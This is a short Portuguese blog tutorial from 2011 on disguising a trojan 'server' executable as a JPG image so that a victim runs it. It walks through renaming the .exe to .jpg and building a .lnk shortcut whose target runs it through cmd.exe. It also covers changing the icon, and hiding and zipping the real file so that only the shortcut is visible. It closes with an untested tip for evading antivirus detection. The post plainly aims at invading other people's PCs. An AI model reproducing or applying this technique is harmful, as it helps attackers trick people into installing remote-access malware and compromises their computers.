quarta-feira, 20 de abril de 2011

Aprenda a camuflar seu trojan em uma falsa imagem

1 - Pegue seu servidor.exe e renomeie ele para servidor.jpg, vai aparecer uma mensagem do windows, apenas confirme.

2- Agora que vem o truque: Voce irá fazer um atalho com uma linha de comando, fazendo um servidor.jpg ser executado normalmente como servidor.exe(Executavel)

3 - Clique com o botão direito em uma area em branco e crie um atalho, na primeira opção "linha de comando", selecione o arquivo jpg que esta disfarçado, na segunda opção "digite um nome para o atalho", coloque um nome qualquer com a extensão lnk, exemplo: arquivo.lnk , depois clique em concluir.

4 - Agora clique com o botão direito do mouse no arquivo.lnk, vá em Propriedades > Geral

5 - Na opção "Destino", coloque esta linha de comando:

1.%systemroot%\System32\cmd.exe /c start servidor.jpg


O Interpretador do Windows irá executar o servidor.exe como se fosse uma imagem!

Você pode alterar o ícone do arquivo.lnk como voce quiser...

A desvantagem é que voce tera que enviar 2 arquivos para o PC a ser invadido, para resolver isto, apenas oculte o servidor pelo próprio Windows e zipe ele, quando a pessoa for "Unzipar" estará lá apenas o Atalho.lnk
Dizem que se o seu servidor estiver detectavel use o programa chamado "Filzip", ele entao irá criar um arquivo .sfx, da forma que os joiners faziam antigamente, com algumas adaptações, porém nao cheguei a testar esse método.


0 comentários:

Postar um comentário